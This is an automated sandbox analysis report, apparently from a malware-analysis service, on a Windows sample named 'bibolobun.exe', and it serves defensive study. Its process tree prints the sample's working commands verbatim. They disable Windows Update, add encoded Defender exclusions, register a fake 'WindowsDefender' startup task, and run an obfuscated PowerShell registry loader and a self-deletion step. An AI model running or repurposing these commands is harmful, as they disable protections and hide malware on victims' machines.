bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

General

Target

bibolobun.exe
Size

5.1MB
MD5

2438b851e157a3f70bd48af1984b2139
SHA1

105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256

bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512

ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
SSDEEP

98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

5112 takeown.exe
2936 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

5112 takeown.exe
2936 icacls.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1040 sc.exe
1216 sc.exe
4212 sc.exe
1244 sc.exe
1120 sc.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

748 reg.exe
4640 reg.exe
1012 reg.exe
2260 reg.exe
4880 reg.exe
2356 reg.exe
8 reg.exe
1880 reg.exe
4176 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3488 powershell.exe
3488 powershell.exe
2440 powershell.exe
2440 powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
5112	takeown.exe
2936	icacls.exe

pid	process
5112	takeown.exe
2936	icacls.exe

pid	process
1040	sc.exe
1216	sc.exe
4212	sc.exe
1244	sc.exe
1120	sc.exe

pid	process
748	reg.exe
4640	reg.exe
1012	reg.exe
2260	reg.exe
4880	reg.exe
2356	reg.exe
8	reg.exe
1880	reg.exe
4176	reg.exe

pid	process
3488	powershell.exe
3488	powershell.exe
2440	powershell.exe
2440	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeShutdownPrivilege	988	powercfg.exe
Token: SeCreatePagefilePrivilege	988	powercfg.exe
Token: SeShutdownPrivilege	224	powercfg.exe
Token: SeCreatePagefilePrivilege	224	powercfg.exe
Token: SeShutdownPrivilege	1336	powercfg.exe
Token: SeCreatePagefilePrivilege	1336	powercfg.exe
Token: SeShutdownPrivilege	4976	powercfg.exe
Token: SeCreatePagefilePrivilege	4976	powercfg.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeTakeOwnershipPrivilege	5112	takeown.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

bibolobun.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 4964 wrote to memory of 4580	4964	bibolobun.exe	conhost.exe
PID 4964 wrote to memory of 4580	4964	bibolobun.exe	conhost.exe
PID 4964 wrote to memory of 4580	4964	bibolobun.exe	conhost.exe
PID 4580 wrote to memory of 3488	4580	conhost.exe	powershell.exe
PID 4580 wrote to memory of 3488	4580	conhost.exe	powershell.exe
PID 4580 wrote to memory of 3900	4580	conhost.exe	cmd.exe
PID 4580 wrote to memory of 3900	4580	conhost.exe	cmd.exe
PID 4580 wrote to memory of 4124	4580	conhost.exe	cmd.exe
PID 4580 wrote to memory of 4124	4580	conhost.exe	cmd.exe
PID 3900 wrote to memory of 1040	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 1040	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 1216	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 1216	3900	cmd.exe	sc.exe
PID 4124 wrote to memory of 988	4124	cmd.exe	powercfg.exe
PID 4124 wrote to memory of 988	4124	cmd.exe	powercfg.exe
PID 4124 wrote to memory of 224	4124	cmd.exe	powercfg.exe
PID 4124 wrote to memory of 224	4124	cmd.exe	powercfg.exe
PID 3900 wrote to memory of 4212	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 4212	3900	cmd.exe	sc.exe
PID 4124 wrote to memory of 1336	4124	cmd.exe	powercfg.exe
PID 4124 wrote to memory of 1336	4124	cmd.exe	powercfg.exe
PID 4580 wrote to memory of 2440	4580	conhost.exe	powershell.exe
PID 4580 wrote to memory of 2440	4580	conhost.exe	powershell.exe
PID 4124 wrote to memory of 4976	4124	cmd.exe	powercfg.exe
PID 4124 wrote to memory of 4976	4124	cmd.exe	powercfg.exe
PID 3900 wrote to memory of 1244	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 1244	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 1120	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 1120	3900	cmd.exe	sc.exe
PID 3900 wrote to memory of 748	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 748	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 4640	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 4640	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 8	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 8	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 1880	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 1880	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 4176	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 4176	3900	cmd.exe	reg.exe
PID 3900 wrote to memory of 5112	3900	cmd.exe	takeown.exe
PID 3900 wrote to memory of 5112	3900	cmd.exe	takeown.exe

C:\Users\Admin\AppData\Local\Temp\bibolobun.exe
"C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4964

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1040

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1216

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:4212

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1244

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1120

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:748

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:8

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1880

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4176

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2936

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1012

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2260

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4880

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2356

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:4740

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1888

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4956

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:4116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:3944

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:4888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
3⤵
PID:508

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsDefender"
4⤵
PID:4604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
3⤵
PID:836

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:400

C:\Program Files\Platform\Defender\update.exe
"C:\Program Files\Platform\Defender\update.exe"
1⤵
PID:3288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:4624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:2708

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6ab240f6-be2f-4a8e-ac90-75b88bd58102}
1⤵
PID:1504

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
be9965796e35a7999ce50af07f73b631

SHA1
dde100f3f5a51fa399755fefd49da003d887742a

SHA256
6ea6a56f5d5ec6f60b5a748840eed28859f792db2e37f4c1c419e3a92fc619b3

SHA512
45369246c8f6e80fa7a3c34db98922702e5f10e67348c94bb27f5bb241ad72cecd72ff5843a2c6b47cec390a6b9c97ba3c4d4244c62b8119ce1b2ca0c3dc3e37

Download Submit
\Users\Admin\AppData\Roaming\D2B6.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/8-154-0x0000000000000000-mapping.dmp

Download
memory/224-143-0x0000000000000000-mapping.dmp

Download
memory/400-169-0x0000000000000000-mapping.dmp

Download
memory/508-164-0x0000000000000000-mapping.dmp

Download
memory/672-197-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmp

Filesize
64KB

Download
memory/748-151-0x0000000000000000-mapping.dmp

Download
memory/836-165-0x0000000000000000-mapping.dmp

Download
memory/988-142-0x0000000000000000-mapping.dmp

Download
memory/1012-166-0x0000000000000000-mapping.dmp

Download
memory/1040-140-0x0000000000000000-mapping.dmp

Download
memory/1120-150-0x0000000000000000-mapping.dmp

Download
memory/1216-141-0x0000000000000000-mapping.dmp

Download
memory/1244-148-0x0000000000000000-mapping.dmp

Download
memory/1336-145-0x0000000000000000-mapping.dmp

Download
memory/1340-181-0x0000000000000000-mapping.dmp

Download
memory/1504-192-0x00007FFD59200000-0x00007FFD592BE000-memory.dmp

Filesize
760KB

Download
memory/1504-188-0x00000001400033F4-mapping.dmp

Download
memory/1504-190-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1504-191-0x00007FFD5B1B0000-0x00007FFD5B3A5000-memory.dmp

Filesize
2.0MB

Download
memory/1504-187-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1504-189-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1880-156-0x0000000000000000-mapping.dmp

Download
memory/1888-176-0x0000000000000000-mapping.dmp

Download
memory/2260-168-0x0000000000000000-mapping.dmp

Download
memory/2356-174-0x0000000000000000-mapping.dmp

Download
memory/2440-155-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmp

Filesize
10.8MB

Download
memory/2440-160-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmp

Filesize
10.8MB

Download
memory/2440-146-0x0000000000000000-mapping.dmp

Download
memory/2708-194-0x00007FFD59200000-0x00007FFD592BE000-memory.dmp

Filesize
760KB

Download
memory/2708-193-0x00007FFD5B1B0000-0x00007FFD5B3A5000-memory.dmp

Filesize
2.0MB

Download
memory/2708-185-0x00007FFD59200000-0x00007FFD592BE000-memory.dmp

Filesize
760KB

Download
memory/2708-184-0x00007FFD3D010000-0x00007FFD3DAD1000-memory.dmp

Filesize
10.8MB

Download
memory/2708-183-0x00007FFD5B1B0000-0x00007FFD5B3A5000-memory.dmp

Filesize
2.0MB

Download
memory/2708-195-0x00007FFD3D010000-0x00007FFD3DAD1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-159-0x0000000000000000-mapping.dmp

Download
memory/3488-135-0x000001D00F7B0000-0x000001D00F7D2000-memory.dmp

Filesize
136KB

Download
memory/3488-134-0x0000000000000000-mapping.dmp

Download
memory/3488-137-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmp

Filesize
10.8MB

Download
memory/3488-136-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmp

Filesize
10.8MB

Download
memory/3900-138-0x0000000000000000-mapping.dmp

Download
memory/3944-179-0x0000000000000000-mapping.dmp

Download
memory/3976-180-0x0000000000000000-mapping.dmp

Download
memory/4116-178-0x0000000000000000-mapping.dmp

Download
memory/4124-139-0x0000000000000000-mapping.dmp

Download
memory/4176-157-0x0000000000000000-mapping.dmp

Download
memory/4212-144-0x0000000000000000-mapping.dmp

Download
memory/4580-170-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmp

Filesize
10.8MB

Download
memory/4580-133-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmp

Filesize
10.8MB

Download
memory/4580-132-0x000001D671140000-0x000001D671612000-memory.dmp

Filesize
4.8MB

Download
memory/4580-161-0x000001D6742C0000-0x000001D6742D2000-memory.dmp

Filesize
72KB

Download
memory/4604-167-0x0000000000000000-mapping.dmp

Download
memory/4624-182-0x00000000039C0000-0x00000000039F6000-memory.dmp

Filesize
216KB

Download
memory/4624-186-0x0000000004140000-0x0000000004768000-memory.dmp

Filesize
6.2MB

Download
memory/4640-152-0x0000000000000000-mapping.dmp

Download
memory/4740-175-0x0000000000000000-mapping.dmp

Download
memory/4880-171-0x0000000000000000-mapping.dmp

Download
memory/4888-163-0x00007FF7E4E61844-mapping.dmp

Download
memory/4956-177-0x0000000000000000-mapping.dmp

Download
memory/4976-147-0x0000000000000000-mapping.dmp

Download
memory/5112-158-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads